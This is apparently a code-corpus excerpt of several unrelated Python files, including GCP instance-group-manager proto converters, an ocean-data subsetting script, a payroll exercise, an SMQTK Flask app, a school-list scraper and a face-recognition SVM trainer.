res.ClearField(\"preserved_state\")\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicy(\n preserved_state=InstanceGroupManagerStatefulPolicyPreservedState.from_proto(\n resource.preserved_state\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatefulPolicy.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerStatefulPolicy.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedState(object):\n def __init__(\n self, disks: dict = None, internal_ips: dict = None, external_ips: dict = None\n ):\n self.disks = disks\n self.internal_ips = internal_ips\n self.external_ips = external_ips\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedState()\n )\n if Primitive.to_proto(resource.disks):\n res.disks = Primitive.to_proto(resource.disks)\n if Primitive.to_proto(resource.internal_ips):\n res.internal_ips = Primitive.to_proto(resource.internal_ips)\n if Primitive.to_proto(resource.external_ips):\n res.external_ips = Primitive.to_proto(resource.external_ips)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedState(\n disks=Primitive.from_proto(resource.disks),\n internal_ips=Primitive.from_proto(resource.internal_ips),\n external_ips=Primitive.from_proto(resource.external_ips),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedState.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedState.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateDisks(object):\n def __init__(self, auto_delete: str = None):\n self.auto_delete = auto_delete\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisks()\n )\n if InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.to_proto(\n resource.auto_delete\n ):\n res.auto_delete = InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.to_proto(\n resource.auto_delete\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedStateDisks(\n auto_delete=InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.from_proto(\n resource.auto_delete\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateDisksArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateDisks.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateDisks.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateInternalIps(object):\n def __init__(self, auto_delete: str = None):\n self.auto_delete = auto_delete\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIps()\n )\n if InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n ):\n res.auto_delete = InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedStateInternalIps(\n auto_delete=InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.from_proto(\n resource.auto_delete\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateInternalIps.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateInternalIps.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateExternalIps(object):\n def __init__(self, auto_delete: str = None):\n self.auto_delete = auto_delete\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIps()\n )\n if InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n ):\n res.auto_delete = InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedStateExternalIps(\n auto_delete=InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.from_proto(\n resource.auto_delete\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateExternalIps.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateExternalIps.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerDistributionPolicyTargetShapeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum.Value(\n \"ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyTypeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyMinimalActionEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyReplacementMethodEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.Value(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.Value(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.Value(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerFailoverActionEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerFailoverActionEnum.Value(\n \"ComputeBetaInstanceGroupManagerFailoverActionEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerFailoverActionEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerFailoverActionEnum\") :\n ]\n\n\nclass Primitive(object):\n @classmethod\n def to_proto(self, s):\n if not s:\n return \"\"\n return s\n\n @classmethod\n def from_proto(self, s):\n return s\n","sub_path":"python/services/compute/beta/instance_group_manager.py","file_name":"instance_group_manager.py","file_ext":"py","file_size_in_byte":59008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"201631523","text":"from netCDF4 import Dataset\nimport numpy.ma as ma\n\n# import the netcdf file using Dataset\ndataset = Dataset(r'/Users/brownscholar/Desktop/Internships/ocean-ml/session-10-31/ssh_1572470095877.nc')\n\n# read in and create variable for lat:\nlat = dataset['latitude']\n\n# lon:\nlon = dataset['longitude']\n\n# adt:\nadt = dataset['adt']\n\n# print shape of the adt variable:\nprint(adt.shape)\n\n# you will need this:\nBATS_lat_max = 39.453\nBATS_lon_max = 360 -59.648999999999994 # converting from degrees west to degrees east\nBATS_lat_min = 19.663 \nBATS_lon_min = 360 -66.211 #same\n\nprint(lat[:])\n\nlat_index = set()\nindex = 0\n\nfor i in lat: \n\tif i >= BATS_lat_min and i <= BATS_lat_max:\n\t\tlat_index.add(index) # Must do .add in order to add for a set\n\tindex += 1\n\nprint(lat_index) \n\nlon_index = set()\nindex2 = 0\n\nfor i in lon: \n\tif i >= BATS_lon_min and i <= BATS_lon_max:\n\t\tlon_index.add(index2) # Must do .add in order to add for a set\n\tindex2 += 1 \n\nprint(lon_index) \n\nlat_index_min = min(lat_index)\nlat_index_max = max(lat_index)\n\nlon_index_min = min(lon_index)\nlon_index_max = max(lon_index)\n\nprint(\"Max of Lat:\", str(lat_index_max), \"\\nMin of Lat:\", str(lat_index_min), \"\\nMax of Lon:\", lon_index_max, \"\\nMin of Lon:\", lon_index_min)\n\nBATSadt = adt[:, lat_index_min:lat_index_max, lon_index_min:lon_index_max]\n\nprint(BATSadt.shape)\n\n\n","sub_path":"session-10-31/cutting_data.py","file_name":"cutting_data.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"420348804","text":"'''\n@Author: longfengpili\n@Date: 2020-03-09 09:45:10\n@LastEditTime: 2020-03-09 19:56:14\n@github: https://github.com/longfengpili\n'''\n#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n\n\nimport threading\nfrom queue import Queue\nimport time\n \nqueue = Queue()\n \n \ndef put_data_in_queue():\n for i in range(10):\n queue.put(i)\n \n \nclass MyThread(threading.Thread):\n def run(self):\n while not queue.empty():\n sleep_times = queue.get()\n print(sleep_times)\n time.sleep(sleep_times)\n queue.task_done()\n \n \ndef main_function():\n threads_num = 6\n while True:\n put_data_in_queue()\n for i in range(threads_num):\n myThread = MyThread()\n myThread.setDaemon(True)\n myThread.start()\n queue.join()\n time.sleep(3)\n\nmain_function()","sub_path":"syncio/asyncio_test.py","file_name":"asyncio_test.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"250709644","text":"# Lab Exercise 9\n# Calculate a person's payroll\n\nclass PayRoll:\n\t\"\"\"\n\tCalculate a person's paypall. Print out their name, how many normal hours\n\tthey work at what wage, and how much money earned for that. \n\tPrint over time if they worked more than 40hr a week.\n\tPrint out the total.\n\t\"\"\"\n\tdef __init__(self, name, wage, hours):\n\t\tself.name = name\n\t\tself.wage = wage\n\t\tself.hours = hours\n\t\t\n\n\t# Display person's regular pay\n\tdef calculate_pay(self):\n\t\tovertime = overtime_pay = reg_pay = total_pay = 0\n\t\n\t\tif self.hours <= 40:\n\t\t\treg_pay = self.hours * self.wage\n\t\telif self.hours > 40:\n\t\t\treg_pay = 40 * self.wage\n\t\t\tovertime = self.hours - 40\n\t\t\tovertime_pay = (self.wage * 1.5) * overtime\n\n\t\ttotal_pay = reg_pay + overtime_pay\n\n\n\t\tprint(\"You're {}.\" .format(self.name))\n\t\tprint(\"Your worked {} hours.\" .format(self.hours))\n\t\tprint(\"Your hourly wage is:{}\" .format(self.wage) + \" per hour.\")\n\t\tprint(\"Your regular pay is ${}.\" .format(reg_pay))\n\t\tprint(\"You OT pay ${}.\" .format(overtime_pay))\n\t\tprint(\"You total pay is ${}.\" .format(total_pay))\n\t\tprint(\"-----------------------------\")\n\nname = PayRoll('James', 10, 50)\nname2 = PayRoll('Amy', 15, 60)\n\nname.calculate_pay()\nname2.calculate_pay()\n\t\t\n\t\t","sub_path":"class_calculate_person_payroll.py","file_name":"class_calculate_person_payroll.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"353494286","text":"import Input\nimport Output\n\nclass Driver:\n # Class variable\n # List to store information of students\n students = []\n # List to store information of courses\n courses = []\n # List to store information of marks\n marks = []\n\n # Class variable\n nofstudents = None\n nofcourses = None\n\n def __init__(self):\n self.input = Input.Input(self)\n self.output = Output.Output(self)\n\n\n # Function to run the program\n def run_Driver(self):\n print(\"Please select operation: \\n\"\n \"1.Input number of students \\n\"\n \"2.Input number of courses \\n\"\n \"3.Input information for students \\n\"\n \"4.Input information for courses \\n\"\n \"5.Input mark for given courses \\n\"\n \"6.Calculate GPA for given student\\n\"\n \"7.Sort student by gpa\\n\"\n \"8.List students \\n\"\n \"9.List courses \\n\"\n \"10.List marks \\n\"\n \"11.Exit\")\n while True:\n select = int(input(\"Select operations form 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11:\"))\n if select == 1:\n self.input.input_number_students()\n elif select == 2:\n self.input.input_number_courses()\n elif select == 3:\n self.input.input_students_infor()\n elif select == 4:\n self.input.input_courses_infor()\n elif select == 5:\n self.input.input_mark()\n elif select == 6:\n self.output.calculate_GPA()\n elif select == 7:\n self.output.sort_student_list()\n elif select == 8:\n self.output.list_students()\n elif select == 9:\n self.output.list_courses()\n elif select == 10:\n self.output.list_mark()\n elif select == 11:\n print(\"Exited!!!\")\n break\n else:\n print(\"Invalid value\")\n","sub_path":"PW4/domains/Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"186946682","text":"\"\"\"\nTop level flask application\n\"\"\"\n\nimport flask\nimport os.path\n\nfrom smqtk.utils import DatabaseInfo\nfrom smqtk.utils.configuration import merge_configs\nfrom smqtk.utils.mongo_sessions import MongoSessionInterface\nfrom smqtk.web import SmqtkWebApp\n\nfrom .modules.login import LoginMod\nfrom .modules.iqr import IqrSearch\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass IqrSearchApp (SmqtkWebApp):\n\n @classmethod\n def is_usable(cls):\n return True\n\n @classmethod\n def get_default_config(cls):\n c = super(IqrSearchApp, cls).get_default_config()\n merge_configs(c, {\n \"mongo\": {\n \"server\": \"127.0.0.1:27017\",\n \"database\": \"smqtk\",\n },\n # Each entry in this mapping generates a new tab in the GUI\n \"iqr_tabs\": [\n IqrSearch.get_default_config(),\n ]\n })\n return c\n\n @classmethod\n def from_config(cls, config_dict):\n return cls(config_dict)\n\n def __init__(self, json_config):\n super(IqrSearchApp, self).__init__(json_config)\n\n #\n # Database setup using Mongo\n #\n h, p = self.json_config['mongo']['server'].split(':')\n n = self.json_config['mongo']['database']\n self.db_info = DatabaseInfo(h, p, n)\n\n # Use mongo for session storage.\n # -> This allows session modification during Flask methods called from\n # AJAX routines (default Flask sessions do not)\n self.session_interface = MongoSessionInterface(self.db_info.host,\n self.db_info.port,\n self.db_info.name)\n\n #\n # Misc. Setup\n #\n\n # Add 'do' statement usage\n self.jinja_env.add_extension('jinja2.ext.do')\n\n #\n # Modules\n #\n # Load up required and optional module blueprints\n #\n\n # Navigable blueprints. This should contain the blueprints that a user\n # should be able to navigate to. Not all blueprints have navigable\n # content or should allow user explicit navigation to, thus this\n # structure.\n #: :type: list of flask.Blueprint\n self._navigable_blueprints = []\n\n # Login module\n self.log.info(\"Initializing Login Blueprint\")\n\n self.module_login = LoginMod('login', self)\n self.register_blueprint(self.module_login)\n\n # IQR modules\n # - for each entry in 'iqr_tabs', initialize a separate IqrSearch\n # instance.\n self._iqr_search_modules = []\n for iqr_search_config in self.json_config['iqr_tabs']:\n self.log.info(\"Initializing IQR tab '%s'\",\n iqr_search_config['name'])\n self.log.debug(\"IQR tab config:\\n%s\", iqr_search_config)\n m = IqrSearch.from_config(iqr_search_config, self)\n self.register_blueprint(m)\n self.add_navigable_blueprint(m)\n self._iqr_search_modules.append(m)\n\n #\n # Basic routing\n #\n\n @self.route('/home')\n @self.route('/')\n def smqtk_index():\n self.log.info(\"Session: %s\", flask.session.items())\n # noinspection PyUnresolvedReferences\n return flask.render_template(\"index.html\", **self.nav_bar_content())\n\n def add_navigable_blueprint(self, bp):\n \"\"\"\n Register a navigable blueprint. This is not the same thing as\n registering a blueprint with flask, which should happen separately.\n\n :param bp: Blueprint to register as navigable via the navigation bar.\n :type bp: flask.Blueprint\n\n \"\"\"\n self._navigable_blueprints.append(bp)\n\n def nav_bar_content(self):\n \"\"\"\n Formatted dictionary for return during a flask.render_template() call.\n This content must be included in all flask.render_template calls that\n are rendering a template that descends from our ``base.html`` template\n in order to allow proper construction and rendering of navigation bar\n content.\n\n For example, when returning a flask.render_template() call:\n >> ret = {\"things\": \"and stuff\"}\n >> ret.update(smqtk_search_app.nav_bar_content())\n >> return flask.render_template(\"some_template.tmpl\", **ret)\n\n :return: Dictionary of content required for proper display of the\n navigation bar. Contains keys of module names and values of module\n URL prefixes.\n :rtype: {\"nav_content\": list of (tuple of str)}\n \"\"\"\n l = []\n for nbp in self._navigable_blueprints:\n l.append((nbp.name, nbp.url_prefix))\n return {\n \"nav_content\": l\n }\n\n\nAPPLICATION_CLASS = IqrSearchApp\n","sub_path":"python/smqtk/web/search_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"481459935","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport urllib.request\nimport bs4\n\nurl =\"http://www.goeas.kr/USR/ORG/MNU9/SchoolList.do?orgType=B\"\nhtml = urllib.request.urlopen(url)\nbs_obj = bs4.BeautifulSoup(html, 'html.parser')\n\nall_eleSc = bs_obj.find('table',{'class':'dtl'})\nall_td = all_eleSc.findAll('td')\n\nlist_td = []\n\n# 태그를 텍스트로 바꾸어서 리스트로 변환\nfor td in all_td:\n td_text = td.text.replace('\\n','').strip()\n list_td.append(td_text) #결과값을 리스트에 추가하기\n\nprint(\"구분 /\", \"학교명 /\", '주소 /', '교무실 /', '행정실 /', '팩스')\n# 리스트를 6개씩 분할하여 출력하기\nstart_pos = 0\nend_pos = len(list_td)\ndiv = 6\n\nfor i in range(start_pos,end_pos+div,div): #i는 왜 사용된지 잘 이해가 안됨.\n out = list_td[start_pos:start_pos+div]\n if out != []:\n print(' / '.join(out)) #리스트를 문자열로 변환\n start_pos = start_pos + div\n\ninput()\n\n\n# 한줄씩 나오는 리스트를 붙이려면? 분할자를 이용\n# 리스트를 이어 붙이는 방법은?\n","sub_path":"크롤링_안산교육지원청_2018/py_script_안산관내 초등학교 연락처_200309.py","file_name":"py_script_안산관내 초등학교 연락처_200309.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"484940468","text":"import os\nimport logging\nimport time\nimport imagehash\nimport cv2\nfrom PIL import Image\n\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.externals import joblib\n\nimport faceapi\nimport numpy as np\nfrom faceapi.utils import log_center\n\nimport faceInfo\n\nfileDir = os.path.dirname(os.path.realpath(__file__))\nsvm_dir = os.path.join(fileDir, 'svm')\n_DEFAULT_SVM_FILE_NAME = 'svm.pkl'\n\n\nclass Trainer:\n def __init__(self, train_db):\n self._log = log_center.make_logger(__name__, logging.DEBUG)\n\n self._save_result = False\n self._face_db = train_db\n self._face_eigener = faceapi.eigener.make_eigener()\n\n self._training_id = -1\n self._training_name = ''\n\n self._svm_file = os.path.join(svm_dir, _DEFAULT_SVM_FILE_NAME)\n if not os.path.exists(svm_dir):\n os.makedirs(svm_dir)\n\n def loadSVM(self):\n if os.path.isfile(self._svm_file):\n self._svm = joblib.load(self._svm_file)\n return self._svm\n\n def faceList(self):\n list = []\n for info in self._face_db.dbList():\n face_info = faceInfo.FaceInfo(\n info['id'],\n info['name'],\n [float(x) for x in info['eigen'].split(',')],\n info['src_hash'].encode('ascii', 'ignore'),\n info['face_img'].encode('ascii', 'ignore'),\n info['class_id'])\n list.append(face_info)\n return list\n\n\n def trainFace(self, name, cv_img, imgPath, face):\n self._training_id = self._toIdentity(name)\n self._training_name = name\n self._log.info('Training new image')\n if self._training_id is None:\n people_list = self._face_db.distinct_search(['name', 'class_id'], 'class_id')\n self._training_id = len(people_list)\n\n if cv_img is not None:\n img = Image.fromarray(cv2.flip(cv_img, 1))\n pil_img = self._toPilImg(img)\n src_hash = str(imagehash.phash(pil_img, hash_size=16))\n\n db_list = self._face_db.search(\n 'src_hash',\n '{}'.format(src_hash),\n 1)\n\n if len(db_list) > 0:\n self._log.debug('trained image, skip it')\n return False\n\n t = time.time()\n phash, rep = self._face_eigener.eigenValue(face.img)\n\n record = faceInfo.FaceInfo(\n 0,\n self._training_name,\n rep,\n src_hash,\n imgPath,\n self._training_id)\n t = time.time() - t\n self._log.debug(\"training img done({})\".format(t))\n\n self._face_db.addFace(record)\n\n self._training_id = -1\n self._training_name = ''\n\n\n\n def trainSVM(self):\n self._db_dict = {}\n for info in self._face_db.dbList():\n h = info['id']\n info.pop(\"id\", None)\n self._db_dict[h] = info\n\n # train svm\n param_grid = [\n {'C': [1, 10, 100, 1000],\n 'kernel': ['linear']},\n {'C': [1, 10, 100, 1000],\n 'gamma': [0.001, 0.0001],\n 'kernel': ['rbf']}]\n\n d = self._trainData()\n if d is None:\n self._svm = None\n return\n\n self._log.info('Training svm')\n t = time.time()\n (X, y) = d\n self._svm = GridSearchCV(\n SVC(C=1, probability=True),\n param_grid, cv=5).fit(X, y)\n self._log.info(\"train svm: {}\".format(self._svm))\n\n joblib.dump(self._svm, self._svm_file)\n # print 'save svm: {}'.format(ret)\n self._log.info('Training svm done({})'.format(time.time() - t))\n\n def _toIdentity(self, name):\n db_name_map = self._face_db.distinct_search(\n ['name', 'class_id'], 'class_id')\n\n if len(db_name_map) == 0:\n return None\n\n check_ret = [\n (name_dic['name'], name_dic['class_id'])\n for name_dic in db_name_map\n if name_dic['name'] == name]\n\n if len(check_ret) == 0:\n return None\n\n class_id = (check_ret[0])[1]\n\n return class_id\n\n def _toPilImg(self, image):\n if isinstance(image, basestring):\n img = Image.open(image).convert('RGB')\n elif isinstance(image, Image.Image):\n img = image.convert('RGB')\n else:\n img = None\n return img\n\n def _trainData(self):\n X = []\n y = []\n\n # db_list = self._db_dict.values()\n # db_list.sort(key=lambda info: info['class_id'])\n for info in self._db_dict.values():\n rep_list = [float(x) for x in info['eigen'].split(',')]\n X.append(rep_list)\n y.append(info['class_id'])\n\n db_names = self._face_db.distinct_search(\n ['name', 'class_id'], 'class_id')\n if len(db_names) == 1:\n self._log.info(\"just one class, do not train svm.\")\n return None\n\n cnt = len(set(y + [-1])) - 1\n if cnt == 0:\n return None\n\n X = np.vstack(X)\n y = np.array(y)\n\n self._log.info(\"classes({}): {}\".format(len(y), y))\n # print 'X({}):\\n{}'.format(len(X), X)\n return (X, y)","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"296034925","text":"from flask import render_template\n\n\nclass SummaryAnalysisController:\n\n def __init__(self, parameterService, tickerRateService, ticketAnalysisService , bullishVsBearishAnalysisService ,linearRegressionSerice, priceChangeAnalysisService, template):\n self.time_frame = 1500\n self.parameterService = parameterService\n self.tickerRateService = tickerRateService\n self.ticketAnalysisService = ticketAnalysisService\n self.bullishVsBearishAnalysisService = bullishVsBearishAnalysisService\n self.linearRegressionSerice = linearRegressionSerice\n self.priceChangeAnalysisService = priceChangeAnalysisService\n self.template = template\n\n def dispatch(self, request):\n tickers, from_date, till_date = self.parameterService.init_params(self.time_frame)\n bullish_vs_bearish_totals = None\n slope_and_rsquare_totals = None\n price_changes = None\n\n if request.method == 'POST':\n tickers, from_date, till_date = self.parameterService.process_params(request)\n tickers = tickers[0]\n if not (tickers is None or from_date is None or till_date is None):\n ticker_data = self.tickerRateService.get_rate(tickers, from_date, till_date)\n if ticker_data is not None:\n ticker_data = self.ticketAnalysisService.analyze_dataframe(ticker_data)\n price_changes = self.priceChangeAnalysisService.calculate_price_change(ticker_data)\n\n bullish_vs_bearish_totals = self.bullishVsBearishAnalysisService.analyze_dataframe(ticker_data)\n\n slope_and_rsquare_totals = self.linearRegressionSerice.calculate_slope_and_rsquare(ticker_data)\n\n return render_template(self.template, tickers = tickers, from_date=from_date, till_date= till_date,\n bullish_vs_bearish_totals=bullish_vs_bearish_totals,\n slope_and_rsquare_totals=slope_and_rsquare_totals,\n 